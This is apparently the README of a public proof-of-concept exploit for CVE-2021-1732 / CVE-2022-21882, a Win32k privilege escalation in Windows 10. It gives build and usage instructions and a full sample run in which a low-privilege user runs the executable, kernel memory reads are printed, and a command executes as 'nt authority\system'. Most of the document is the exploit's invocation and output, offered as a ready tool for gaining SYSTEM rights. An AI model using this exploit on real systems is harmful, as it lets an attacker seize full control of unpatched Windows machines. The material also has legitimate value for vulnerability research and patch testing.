CVE

CVE-2021-1732 / CVE-2022-21882 - The revival of CVE-2021-1732

Win32k Elevation of Privilege Vulnerability. The vulnerability was fixed this month as part of the January 2022 Patch Tuesday. It is the result of a bypass for the earlier CVE-2021-1732 flaw, which allows anyone to gain admin privileges in Windows 10.

Installation

Build your own .exe from source.

Usage

CVE-2021-1732.exe whoami

Examples

Microsoft Windows [Version 10.0.17763.107]
(c) Microsoft Corporation. All rights reserved.

C:\Users\lowpriv> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
JohnDo
The command completed successfully.

C:\Users\lowpriv> whoami
desktop-qiv0pbc\lowpriv

C:\temp>CVE-2021-1732.exe whoami
CreateWnd
Hwnd:000b014a   qwfirstEntryDesktop=000001966C345110
BaseAddress:000001966C345000   RegionSize=:000000000001A000
Hwnd:00050406   qwfirstEntryDesktop=000001966C3431C0
BaseAddress:000001966C343000   RegionSize=:000000000001C000
Hwnd:000903b2   qwfirstEntryDesktop=000001966C342A20
BaseAddress:000001966C342000   RegionSize=:000000000001D000
Hwnd:000300d8   qwfirstEntryDesktop=000001966C342B70
BaseAddress:000001966C342000   RegionSize=:000000000001D000
Hwnd:0013016c   qwfirstEntryDesktop=000001966C341B90
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:00050414   qwfirstEntryDesktop=000001966C341CE0
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:0005017c   qwfirstEntryDesktop=000001966C341E30
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:000502da   qwfirstEntryDesktop=000001966C356830
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Hwnd:00020384   qwfirstEntryDesktop=000001966C356980
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Hwnd:000203ac   qwfirstEntryDesktop=000001966C356AD0
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Min BaseAddress:000001966C341000   RegionSize=:000000000001E000
realMagicHwnd=00000000000303AC
Free ExtraBytes:000000000000124D
set ExtraData == 00000000000431C0
Free ExtraBytes:000000000000124D
dwRet=000000000000FA90
tagWndMin_offset_0x128=000000000000FA90
g_qwvuln=FFFFB73700826960
qwFrist read=FFFFB73700831E70
qwSecond read=FFFFC98914160810
qwSecond read=FFFFB73701A00000
qwFourth read=FFFFB737017F8010
qwFifth read=FFFFC989207F2080
qwSixth read=FFFFC98921421300
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 11296!
===============================
nt authority\system

URL List